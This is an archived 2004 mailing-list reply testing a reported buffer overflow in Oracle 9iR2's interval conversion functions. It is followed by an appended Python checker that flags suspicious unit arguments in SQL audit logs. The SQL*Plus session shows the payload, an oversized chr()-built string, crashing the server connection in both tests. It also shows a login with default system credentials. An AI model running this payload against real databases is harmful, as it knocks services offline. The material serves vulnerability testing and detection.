
Re: [NEWS] Oracle Database 9ir2 Interval Conversion Buffer Overflow

From: Pete Finnigan <oracle_list_at_peterfinnigan.demon.co.uk>
Date: Thu, 26 Feb 2004 20:42:44 +0000
Message-ID: <O7YDGaAEplPABx5w@peterfinnigan.demon.co.uk>


Hi Jared,

I heard about this issue in early Feb. This guy Cesar Cerrudo posted a message to vulnwatch about these two vulnerabilities and also said he had a lot more. I saw a post on Bugtraq yesterday where someone was asking for the patch info. It is not clear if an Oracle fix matches this bug or not and which patch applies. There is no advisory.

Here is the header info from vulnwatch from his post. I have the full email sent to vulnwatch which is similar to Jared's version on securiteam but is longer (no extra technical details, mostly rants).

<quote>
From: Cesar [mailto:cesarc56_at_yahoo.com]
Sent: Thu 2004-02-05 3:15 PM
To: vulnwatch_at_vulnwatch.org
Cc:
Subject: [VulnWatch] Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow
Security Advisory

Name: Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow.
System Affected : Oracle Database 9ir2, previous versions could be affected too.
Severity : High
Remote exploitable : Yes
Author: Cesar Cerrudo.
Date: 02/05/04
Advisory Number: CC020401
</quote>

Anyway, I have run the following test based on what he said in his advisory:

SQL> edit
Wrote file afiedt.buf

  1 SELECT NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJK LMNOPQR'
  2 || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)|
|chr(18)||chr(80)||chr(255)|

  3 ||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)|
|chr(33)||chr(148)||chr(01)|

  4* ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL
SQL> /
ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL

                                             *
ERROR at line 4:
ORA-03113: end-of-file on communication channel

SQL> select sysdate from dual;
select sysdate from dual
*
ERROR at line 1:
ORA-03114: not connected to ORACLE

SQL>
SQL> connect system/manager_at_sans
Connected.
SQL> edit
Wrote file afiedt.buf

  1 SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJK LMNOPQR'
  2 || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)|
|chr(18)||chr(80)||chr(255)|

  3 ||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)|
|chr(33)||chr(148)||chr(01)|

  4* ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL
SQL> /
SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOP QR'
*
ERROR at line 1:
ORA-03113: end-of-file on communication channel

SQL> select sysdate from dual;
select sysdate from dual
*
ERROR at line 1:
ORA-03114: not connected to ORACLE

SQL>

So yes, both of these vulnerabilities will terminate the Oracle connection, so it's possible it could be exploited remotely. The file > c:\Unbreakable.txt is not created though. I have not tried under a debugger to see if anything can be done with the 3113 error in terms of exploiting the stack. If this is a true buffer overflow exploit then he would need to pass some sort of shell code and manipulate the stack to run it. Maybe his chr(??) are some sort of shell code for it to be a buffer overflow and capture the machine. On the surface it doesn't seem to work though.

SQL*net trace didn't tell me much and also an Oracle core is created in the cdump directory with the are you sure text on the top of the stack. I ran this on XP 9ir2 personal edition.

Kind regards

Pete

-- 
Pete Finnigan
email:pete_at_petefinnigan.com
Web site: http://www.petefinnigan.com - Oracle security audit specialists
Book: Oracle security step-by-step Guide - see http://store.sans.org for details.

Received on Thu Feb 26 2004 - 14:42:10 CST
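A defender-side check, added here as an example and not part of Pete's message or of any Oracle tool: it scans captured SQL text (the sample statements are constructed and embedded) for calls to the two interval conversion functions whose unit argument is not one of the documented unit names, which is how the oversized or byte-built strings in the test above would surface in an audit trail.

```python
import re
# Unit names each function accepts (Oracle's documented signatures).
VALID_UNITS = {"NUMTOYMINTERVAL": {"YEAR", "MONTH"},
               "NUMTODSINTERVAL": {"DAY", "HOUR", "MINUTE", "SECOND"}}
CALL_RE = re.compile(r"\b(NUMTOYMINTERVAL|NUMTODSINTERVAL)\s*\(", re.IGNORECASE)
LITERAL_RE = re.compile(r"^'([^']*)'$")

def _split_args(sql, open_idx):
    """Top-level args of the call whose '(' is at open_idx; None if ')' never comes."""
    depth, in_str, args, cur = 1, False, [], []
    for ch in sql[open_idx + 1:]:
        if ch == "'":
            in_str = not in_str          # '' escapes simply toggle twice
        elif not in_str:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
                if depth == 0:
                    args.append("".join(cur).strip())
                    return args
            elif ch == "," and depth == 1:
                args.append("".join(cur).strip())
                cur = []
                continue
        cur.append(ch)
    return None

def check_statement(sql):
    """Return (function, reason) findings for each suspicious call in one statement."""
    findings = []
    for m in CALL_RE.finditer(sql):
        func = m.group(1).upper()
        args = _split_args(sql, m.end() - 1)
        if args is None or len(args) < 2:
            findings.append((func, "malformed or truncated argument list"))
        elif (lit := LITERAL_RE.match(args[1])) is None:
            # concatenation, chr() bytes, a bind or a column: review by hand
            findings.append((func, "unit argument is not a plain literal: " + args[1][:40]))
        elif lit.group(1).upper() not in VALID_UNITS[func]:
            findings.append((func, "unexpected unit literal of length %d" % len(lit.group(1))))
    return findings

# Constructed sample statements, as they might appear in an audit trail.
SAMPLE_AUDIT = [
    "SELECT NUMTOYMINTERVAL(1,'YEAR') FROM DUAL",
    "SELECT NUMTODSINTERVAL(30,'minute') FROM DUAL",
    "SELECT NUMTOYMINTERVAL(1,'" + "A" * 60 + "') FROM DUAL",
    "SELECT NUMTODSINTERVAL(1,'AAAA'||chr(59)||chr(79)) FROM DUAL",
]
```

Statements that pass a bind variable or column as the unit are flagged for manual review rather than treated as clean, since the checker cannot see the runtime value.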
